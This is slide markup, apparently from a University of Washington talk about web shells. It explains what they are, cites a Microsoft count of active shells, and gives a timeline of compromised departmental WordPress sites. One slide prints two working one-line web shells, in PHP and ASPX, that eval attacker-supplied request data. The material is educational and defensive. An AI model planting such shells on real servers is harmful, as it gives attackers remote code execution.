                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>1 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>File inclusion</a:t>
            </a:r>
            <a:endParaRPr sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>3 - Indeterminant</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Web Shells - Background</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Google Shape;121;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1171563"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Software programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> scripts running on a web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>provide functionality,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> allow remote administration</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>May be part of or installed in content management systems such as WordPress and Drupal</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>But also...</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>programs, scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> delivered by exploiting server configuration weaknesses or web application vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-336550" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Can be as simple as one line of code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>making powerful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> malicious shells </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>difficult to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>among common website files</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>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Web Shells – Background (2 of 2)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Google Shape;127;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>ide communications in encrypted HTTPS or encoded plaintext, escaping detection by firewalls, intrusion detection systems, and anti-virus and anti-malware software</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>ersist on the compromised network, using the unauthorized access for stealing data, extending access, extorting, and other purposes</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="4B2E83"/>
              </a:buClr>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>In February 2020, Microsoft reported</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> they</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> track</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="4B2E83"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> an average of 77,000 active web shells spread across 46,000 servers</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="4B2E83"/>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Web Shells</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>PHP: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;?php @eval($_POST['password']);?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ASPX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;%@ Page Language=”Jscript”%&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;%eval(RequestItem[“password”],”unsafe”);%&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:highlight>
                <a:srgbClr val="EFEFEF"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consola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Web Shells at UW</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>May 2018 - 10 different web shells discovered on single site with compromised MySQL database</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Attacker pivoted to UW WordPress sites, undetected</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>September 2018 - Web shells discovered on 156 depts WordPress sites</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-349250" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buFont typeface="Open Sans"/>
              <a:buChar char="⎼"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Permissions on wp-config.php</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>January 2019 - 6 additional depts sites disabled due to compromise</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100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Web Shells at UW (2 of 3)</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1261488"/>
            <a:ext cx="8520600" cy="34164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800">
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>options-new.php:</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
